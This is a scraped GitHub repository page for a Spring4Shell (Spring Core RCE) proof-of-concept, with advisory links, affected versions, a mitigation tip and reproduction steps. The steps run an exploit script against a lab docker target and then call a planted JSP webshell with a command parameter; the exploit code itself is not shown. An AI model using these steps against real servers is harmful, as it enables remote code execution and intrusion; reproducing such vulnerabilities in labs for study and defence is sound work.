Skip to content

craig/SpringCore0day

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits

images

images

 
 

README-Chinese.md

README-Chinese.md

 
 

README.md

README.md

 
 

exp.py

exp.py

 
 

漏洞分析.pdf

漏洞分析.pdf

 
 

Repository files navigation

Information

https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement

https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/?s=03

https://github.com/tweedge/springcore-0day-en

How to reproduce

docker run -d -p 8082:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29

python3 ./exp.py --url http://192.168.0.11:8082

curl --output - "http://192.168.0.11:8082/tomcatwar.jsp?pwd=j&cmd=id"

vulnerable code + poc

Mitigations

https://github.com/blindpirate/spring-rce-2022-03-hotfix (untested)

https://www.praetorian.com/blog/spring-core-jdk9-rce/

Spring Core RCE

After Spring Cloud, on 3.29, another major Spring vulnerability was reported online: Spring Core RCE

(Note from craig: Spring Cloud exploit here: https://github.com/hktalent/spring-spel-0day-poc)

coded poc in circulation

** currently exp has been uploaded exp.py ** circulating coded poc awkward situation

The official Spring patch is also in active production

Link to patches in production for Spring

The vulnerability affects

  1. jdk version 9 and above
  2. using Spring Framework or derivative frameworks

Vulnerability Fix Recommendations

Currently, Spring has not released a patch, so we recommend lowering the jdk version as a temporary solution.

Translated with www.DeepL.com/Translator (free version)

About

SpringCore0day from https://share.vx-underground.org/ & some additional links

Resources

Readme
Activity

Stars

393 stars

Watchers

11 watching

Forks

187 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages